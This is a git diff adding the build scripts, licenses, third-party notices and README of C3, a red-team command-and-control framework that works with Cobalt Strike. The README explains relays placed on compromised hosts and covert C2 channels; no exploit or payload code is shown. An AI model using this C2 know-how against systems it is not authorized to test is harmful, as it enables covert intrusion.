diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..db087c2 --- /dev/null +++ b/.gitignore @@ -0,0 +1,18 @@ +.vs/ +Bin/ +CreateBuild/ +Tmp/ +obj/ +.vscode +*.ipch +*.exe +*.dll +*.pdb +*.db +*.db-journal +*.vcxproj.user +*c3-web-api-log* +PER_BUILD_DYNAMIC_SIGNATURE_SEED.hpp +__pycache__ +Src/Common/C3_BUILD_VERSION_HASH_PART.hxx +Builds/ diff --git a/CleanBinFiles.cmd b/CleanBinFiles.cmd new file mode 100644 index 0000000..e9acbe6 --- /dev/null +++ b/CleanBinFiles.cmd @@ -0,0 +1 @@ +FOR /d /r . %%d IN (Bin) DO @IF EXIST "%%d" rd /s /q "%%d" diff --git a/CleanTempFiles.cmd b/CleanTempFiles.cmd new file mode 100644 index 0000000..db22b26 --- /dev/null +++ b/CleanTempFiles.cmd @@ -0,0 +1,16 @@ +set DIR=%CD% +FOR /d /r . %%d IN (.vs) DO @IF EXIST "%%d" rd /s /q "%%d" +FOR /d /r . %%d IN (Tmp) DO @IF EXIST "%%d" rd /s /q "%%d" +del /s *.obj +del /s *.o +del /s *.pch +del /s *.ipch +del /s *.lastbuildstate +del /s *.tlog +del /s *.pdb +del /s *.ilk +del /s *.idb +del /s *.gch +del /s *.suo +del /s *.VC.db +for /f "usebackq delims=" %%d in (`"dir /ad/b/s | sort /R"`) do rd "%%d" diff --git a/CreateBuild.cmd b/CreateBuild.cmd new file mode 100644 index 0000000..ea88ba8 --- /dev/null +++ b/CreateBuild.cmd @@ -0,0 +1,86 @@ +@REM This script requires MSBuild in PATH. + +@REM Adjust values below before running this script. +@SETLOCAL +@SET BUILD_MAJOR_NO=1 +@SET BUILD_MINOR_NO=0 +@SET BUILD_REVISION_NO=0 +@SET BUILD_PREFIX=C3 +@SET BUILD_HEADER_FILE=Src\Common\C3_BUILD_VERSION_HASH_PART.hxx +@SET BUILDS_PATH=Builds + +@REM Script part starts here. +@ECHO OFF + +ECHO Cleaning from temporary files... +@CALL CleanTempFiles.cmd >nul 2>nul + +ECHO Ensuring '%BUILDS_PATH%' folder exists... +IF EXIST "%BUILDS_PATH%" (RMDIR /s /q "%BUILDS_PATH%") +MKDIR %BUILDS_PATH% + +SET BUILD_FULL_SIGNATURE=%BUILD_PREFIX%-%BUILD_MAJOR_NO%.%BUILD_MINOR_NO%.%BUILD_REVISION_NO% + +ECHO Creating build folder - '%BUILD_FULL_SIGNATURE%'... +IF EXIST %BUILDS_PATH%\\%BUILD_FULL_SIGNATURE% (RMDIR /s /q "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%") +MKDIR %BUILDS_PATH%\\%BUILD_FULL_SIGNATURE% || GOTO :ERROR + +ECHO Creating build versioning header... +SET BuildDefinition=#define C3_BUILD_VERSION +ECHO #include "StdAfx.h" > %BUILD_HEADER_FILE% || GOTO :ERROR +ECHO %BuildDefinition% "%BUILD_FULL_SIGNATURE%" >> %BUILD_HEADER_FILE% || GOTO :ERROR + + +if ""=="%~1" ( + set BuildTool=MSBuild +) else ( + set BuildTool=%1 +) + +ECHO. +ECHO Building x64 binaries... +%BuildTool% /nologo /verbosity:quiet /consoleloggerparameters:summary "Src" "/t:GatewayConsoleExe;NodeRelayConsoleExe;NodeRelayDll" "/p:Configuration=Release" "/p:Platform=x64" || GOTO :ERROR + +ECHO. +ECHO Building x86 binaries... +%BuildTool% /nologo /verbosity:quiet /consoleloggerparameters:summary "Src" "/t:GatewayConsoleExe;NodeRelayConsoleExe;NodeRelayDll" "/p:Configuration=Release" "/p:Platform=x86" || GOTO :ERROR + +ECHO. +ECHO Copying binaries... +IF NOT EXIST "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin" (MKDIR "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin") || GOTO :ERROR +COPY "Bin\\GatewayConsoleExe_r64.exe" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin\\GatewayConsoleExe_r64.exe" || GOTO :ERROR +COPY "Bin\\NodeRelayConsoleExe_r64.exe" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin\\NodeRelayConsoleExe_r64.exe" || GOTO :ERROR +COPY "Bin\\GatewayConsoleExe_r86.exe" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin\\GatewayConsoleExe_r86.exe" || GOTO :ERROR +COPY "Bin\\NodeRelayConsoleExe_r86.exe" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin\\NodeRelayConsoleExe_r86.exe" || GOTO :ERROR +COPY "Bin\\NodeRelayDll_r64.dll" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin\\NodeRelayDll_r64.dll" || GOTO :ERROR +COPY "Bin\\NodeRelayDll_r86.dll" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin\\NodeRelayDll_r86.dll" || GOTO :ERROR + +ECHO. +ECHO Copying sample Gateway configuration... +COPY "Res\\GatewayConfiguration.json" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\Bin\\GatewayConfiguration.json" || GOTO :ERROR + +ECHO. +ECHO Building WebController... +IF EXIST "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\WebController" (RMDIR /s /q "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\WebController") || GOTO :ERROR +dotnet publish -c Release "Src\\WebController\\Backend" || GOTO :ERROR +XCOPY /s /q "Bin\\WebController\\Release\\netcoreapp2.2\\publish" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\WebController\" || GOTO :ERROR + +ECHO. +ECHO Copying scripts... +COPY "StartWebController.cmd" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\StartWebController.cmd" || GOTO :ERROR +COPY "RestartWebController.cmd" "%BUILDS_PATH%\\%BUILD_FULL_SIGNATURE%\\RestartWebController.cmd" || GOTO :ERROR + +ECHO. +ECHO Done. Build %BUILD_FULL_SIGNATURE% successfully created. + +:DONE +ECHO. +ECHO Done. +SET /p answer=Press any button to continue... +EXIT /b 0 + +:ERROR +ECHO. +ECHO Build failed. +SET /p answer=Press any button to continue... +EXIT /b %errorlevel% diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..8c346bd --- /dev/null +++ b/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2018-2019, MWR Infosecurity +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/NOTICE b/NOTICE new file mode 100644 index 0000000..29ee435 --- /dev/null +++ b/NOTICE @@ -0,0 +1,419 @@ +C3 uses following open source projects: + +--- +ADVobfuscator +https://github.com/andrivet/ADVobfuscator + +License: +Written by Sebastien Andrivet - Copyright © 2010-2017 Sebastien Andrivet. + +Redistribution and use in source and binary forms, with or without modification, are permitted >provided that the following conditions are met: +1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +--- +CppCodec +https://github.com/tplgy/cppcodec + +License: +Copyright (c) 2015 Topology Inc. +Copyright (c) 2018 Jakob Petsovits +Copyright (c) various other contributors, see individual files + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + +--- +C++ REST SDK +https://github.com/microsoft/cpprestsdk +License: +C++ REST SDK + +The MIT License (MIT) + +Copyright (c) Microsoft Corporation + +All rights reserved. + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE + +--- +JSON for Modern C++ +https://github.com/nlohmann/json +License: +MIT License + +Copyright (c) 2013-2019 Niels Lohmann + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + +--- +libsodium +https://github.com/jedisct1/libsodium +License: +ISC License + +Copyright (c) 2013-2019 +Frank Denis + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies., + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +--- +Json.NET +https://www.newtonsoft.com/json +License: +The MIT License (MIT) + +Copyright (c) 2007 James Newton-King + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +--- +AsyncEx +https://github.com/StephenCleary/AsyncEx +License: +The MIT License (MIT) + +Copyright (c) 2014 StephenCleary + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + +--- +Serilog +https://serilog.net +License: +Apache License +Version 2.0, January 2004 +http://www.apache.org/licenses/ + +TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + +1. Definitions. + +"License" shall mean the terms and conditions for use, reproduction, and +distribution as defined by Sections 1 through 9 of this document. + +"Licensor" shall mean the copyright owner or entity authorized by the copyright +owner that is granting the License. + +"Legal Entity" shall mean the union of the acting entity and all other entities +that control, are controlled by, or are under common control with that entity. +For the purposes of this definition, "control" means (i) the power, direct or +indirect, to cause the direction or management of such entity, whether by +contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the +outstanding shares, or (iii) beneficial ownership of such entity. + +"You" (or "Your") shall mean an individual or Legal Entity exercising +permissions granted by this License. + +"Source" form shall mean the preferred form for making modifications, including +but not limited to software source code, documentation source, and configuration +files. + +"Object" form shall mean any form resulting from mechanical transformation or +translation of a Source form, including but not limited to compiled object code, +generated documentation, and conversions to other media types. + +"Work" shall mean the work of authorship, whether in Source or Object form, made +available under the License, as indicated by a copyright notice that is included +in or attached to the work (an example is provided in the Appendix below). + +"Derivative Works" shall mean any work, whether in Source or Object form, that +is based on (or derived from) the Work and for which the editorial revisions, +annotations, elaborations, or other modifications represent, as a whole, an +original work of authorship. For the purposes of this License, Derivative Works +shall not include works that remain separable from, or merely link (or bind by +name) to the interfaces of, the Work and Derivative Works thereof. + +"Contribution" shall mean any work of authorship, including the original version +of the Work and any modifications or additions to that Work or Derivative Works +thereof, that is intentionally submitted to Licensor for inclusion in the Work +by the copyright owner or by an individual or Legal Entity authorized to submit +on behalf of the copyright owner. For the purposes of this definition, +"submitted" means any form of electronic, verbal, or written communication sent +to the Licensor or its representatives, including but not limited to +communication on electronic mailing lists, source code control systems, and +issue tracking systems that are managed by, or on behalf of, the Licensor for +the purpose of discussing and improving the Work, but excluding communication +that is conspicuously marked or otherwise designated in writing by the copyright +owner as "Not a Contribution." + +"Contributor" shall mean Licensor and any individual or Legal Entity on behalf +of whom a Contribution has been received by Licensor and subsequently +incorporated within the Work. + +2. Grant of Copyright License. + +Subject to the terms and conditions of this License, each Contributor hereby +grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, +irrevocable copyright license to reproduce, prepare Derivative Works of, +publicly display, publicly perform, sublicense, and distribute the Work and such +Derivative Works in Source or Object form. + +3. Grant of Patent License. + +Subject to the terms and conditions of this License, each Contributor hereby +grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, +irrevocable (except as stated in this section) patent license to make, have +made, use, offer to sell, sell, import, and otherwise transfer the Work, where +such license applies only to those patent claims licensable by such Contributor +that are necessarily infringed by their Contribution(s) alone or by combination +of their Contribution(s) with the Work to which such Contribution(s) was +submitted. If You institute patent litigation against any entity (including a +cross-claim or counterclaim in a lawsuit) alleging that the Work or a +Contribution incorporated within the Work constitutes direct or contributory +patent infringement, then any patent licenses granted to You under this License +for that Work shall terminate as of the date such litigation is filed. + +4. Redistribution. + +You may reproduce and distribute copies of the Work or Derivative Works thereof +in any medium, with or without modifications, and in Source or Object form, +provided that You meet the following conditions: + +You must give any other recipients of the Work or Derivative Works a copy of +this License; and +You must cause any modified files to carry prominent notices stating that You +changed the files; and +You must retain, in the Source form of any Derivative Works that You distribute, +all copyright, patent, trademark, and attribution notices from the Source form +of the Work, excluding those notices that do not pertain to any part of the +Derivative Works; and +If the Work includes a "NOTICE" text file as part of its distribution, then any +Derivative Works that You distribute must include a readable copy of the +attribution notices contained within such NOTICE file, excluding those notices +that do not pertain to any part of the Derivative Works, in at least one of the +following places: within a NOTICE text file distributed as part of the +Derivative Works; within the Source form or documentation, if provided along +with the Derivative Works; or, within a display generated by the Derivative +Works, if and wherever such third-party notices normally appear. The contents of +the NOTICE file are for informational purposes only and do not modify the +License. You may add Your own attribution notices within Derivative Works that +You distribute, alongside or as an addendum to the NOTICE text from the Work, +provided that such additional attribution notices cannot be construed as +modifying the License. +You may add Your own copyright statement to Your modifications and may provide +additional or different license terms and conditions for use, reproduction, or +distribution of Your modifications, or for any such Derivative Works as a whole, +provided Your use, reproduction, and distribution of the Work otherwise complies +with the conditions stated in this License. + +5. Submission of Contributions. + +Unless You explicitly state otherwise, any Contribution intentionally submitted +for inclusion in the Work by You to the Licensor shall be under the terms and +conditions of this License, without any additional terms or conditions. +Notwithstanding the above, nothing herein shall supersede or modify the terms of +any separate license agreement you may have executed with Licensor regarding +such Contributions. + +6. Trademarks. + +This License does not grant permission to use the trade names, trademarks, +service marks, or product names of the Licensor, except as required for +reasonable and customary use in describing the origin of the Work and +reproducing the content of the NOTICE file. + +7. Disclaimer of Warranty. + +Unless required by applicable law or agreed to in writing, Licensor provides the +Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, +including, without limitation, any warranties or conditions of TITLE, +NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are +solely responsible for determining the appropriateness of using or +redistributing the Work and assume any risks associated with Your exercise of +permissions under this License. + +8. Limitation of Liability. + +In no event and under no legal theory, whether in tort (including negligence), +contract, or otherwise, unless required by applicable law (such as deliberate +and grossly negligent acts) or agreed to in writing, shall any Contributor be +liable to You for damages, including any direct, indirect, special, incidental, +or consequential damages of any character arising as a result of this License or +out of the use or inability to use the Work (including but not limited to +damages for loss of goodwill, work stoppage, computer failure or malfunction, or +any and all other commercial damages or losses), even if such Contributor has +been advised of the possibility of such damages. + +9. Accepting Warranty or Additional Liability. + +While redistributing the Work or Derivative Works thereof, You may choose to +offer, and charge a fee for, acceptance of support, warranty, indemnity, or +other liability obligations and/or rights consistent with this License. However, +in accepting such obligations, You may act only on Your own behalf and on Your +sole responsibility, not on behalf of any other Contributor, and only if You +agree to indemnify, defend, and hold each Contributor harmless for any liability +incurred by, or claims asserted against, such Contributor by reason of your +accepting any such warranty or additional liability. + +END OF TERMS AND CONDITIONS + +APPENDIX: How to apply the Apache License to your work + +To apply the Apache License to your work, attach the following boilerplate +notice, with the fields enclosed by brackets "[]" replaced with your own +identifying information. (Don't include the brackets!) The text should be +enclosed in the appropriate comment syntax for the file format. We also +recommend that a file or class name and description of purpose be included on +the same "printed page" as the copyright notice for easier identification within +third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + +--- +libsodium-core +https://github.com/tabrath/libsodium-core/ +License: +The MIT License (MIT) + +Copyright (c) 2013 - 2016 Adam Caudill & Contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +--- +Swashbuckle.AspNetCore +https://github.com/domaindrivendev/Swashbuckle.AspNetCore +License: +The MIT License (MIT) + +Copyright (c) 2016 Richard Morris + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + +--- \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..52391b2 --- /dev/null +++ b/README.md @@ -0,0 +1,63 @@ +# C3 + +![C3](Res/C3.png) + +C3 (Custom Command and Control) is a tool that allows Red Teams to rapidly develop and utilise esoteric command and control channels (C2). It's a framework that extends other red team tooling, such as the commercial Cobalt Strike (CS) product via [ExternalC2](https://www.cobaltstrike.com/downloads/externalc2spec.pdf), which is supported at release. It allows the Red Team to concern themselves only with the C2 they want to implement; relying on the robustness of C3 and the CS tooling to take care of the rest. This efficiency and reliability enable Red Teams to operate safely in critical client environments (by assuring a professional level of stability and security); whilst allowing for safe experimentation and rapid deployment of customised Tactics, Techniques and Procedures (TTPs). Thus, empowering Red Teams to emulate and simulate an adaptive real-world attacker. + +## Usage + +See [this](https://labs.mwrinfosecurity.com/tools/c3) blog post for a detailed tutorial. + +## Glossary + +The most commonly used terms in C3: + +- `Relays` - stand-alone pieces of C3 Networks. They communicate using `Interfaces`. There are two types of `Relays`: `Gate Relays` (or `Gateways`) and `Node Relays`. +- `Gateway` - a special `Relay` that controls one C3 Network. A C3 Network cannot operate without an operational `Gateway`. The `Gateway` is the bridge back to the attacker’s infrastructure from `Node Relays`. It's also responsible for communicating back to a third-party C2 server (such as Cobalt Strike’s Teamserver). `Gateways` should always be hosted within attacker-controlled infrastructure. +- `Node Relay` - an executable to be launched on a compromised host. `Node Relays` communicate through `Devices` either between one another or back to the `Gateway`. +- `Interface` - a high level name given to anything that facilitates the sending and receiving of data within a C3 network. They are always connected to some `Relay` and their purpose is to extend `Relay's` capability. Currently there are three types of `Interfaces`: `Channels`, `Peripherals` and `Connectors`. +- `Devices` - common name for `Channels` and `Peripherals`. This abstraction is created to generalize `Interfaces` that are able to be used on `Node Relays`. +- `Channel` - an `Interface` used to transport data between two `Relays`. `Channels` works in pairs and do not support the one-to-many transmission (see `Negotiation Channels`). +- `Negotiation Channel` - a special `Channel` capable of establishing regular `Channel` connections with multiple `Relays`. The negotiation process is fully automatic. `Negotiation Channels` support only negotiation protocol and cannot be used in any other transmission. +- `Gateway Return Channel (GRC)` - the configured `Channel` that a `Relay` will use to send data back to the `Gateway`. `GRC` may be a route through another `Relay`. The first `Channel` (initial) on a `Node Relay` is automatically set as `GRC` for that `Node Relay`. +- `Peripherals` - a third-party implant of a command and control framework. `Peripherals` talk to their native controllers via a `Controller`. For example, Cobalt Strike’s SMB beacon. +- `Connectors` - an integration with a third-party command and control framework. For instance the ‘External C2’ interface exposed by Cobalt Strike’s Teamserver through the externalc2_start command. +- `Binders` - common name for `Peripherals` and `Connectors`. +- `Device ID` - a dynamic ID that uniquely addresses one `Device` on a `Relay`. +- `Agent ID` - a dynamic ID that uniquely addresses a `Node Relay`. `Node Relays` instantiated from the same executable will have different `Agent IDs`. +- `Build ID` - a static ID that is built into every `Relay`. Stays unchanged over reboots. +- `Route ID` - a pair of an `Agent ID` and a `Device ID`. Used to describe one "path" to a `Node Relay` (`Node Relays` might be reachable via many `Routes`). +- `Route` - a "path" to a `Node Relay`. Every `Relay` keeps a table of all of their child `Relays` (and grandchildren, grand-grandchildren, and so on) along with `Channel` `Device IDs` used to reach that particular `Relay` (see `Route ID`). When a packet from the `Gateway` arrives to a `Node Relay`, routing table is used to choose appropriate `Channel` to send the packet through to the recipient. +- `Update Delay Jitter` - delay between successive updates of an `Interface` (in case of `Channels` - calls to OnReceiveFromChannel method). Can be set to be randomized in provided range of time values. + +## License + +BSD 3-Clause License + +Copyright (c) 2018-2019, MWR Infosecurity +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, 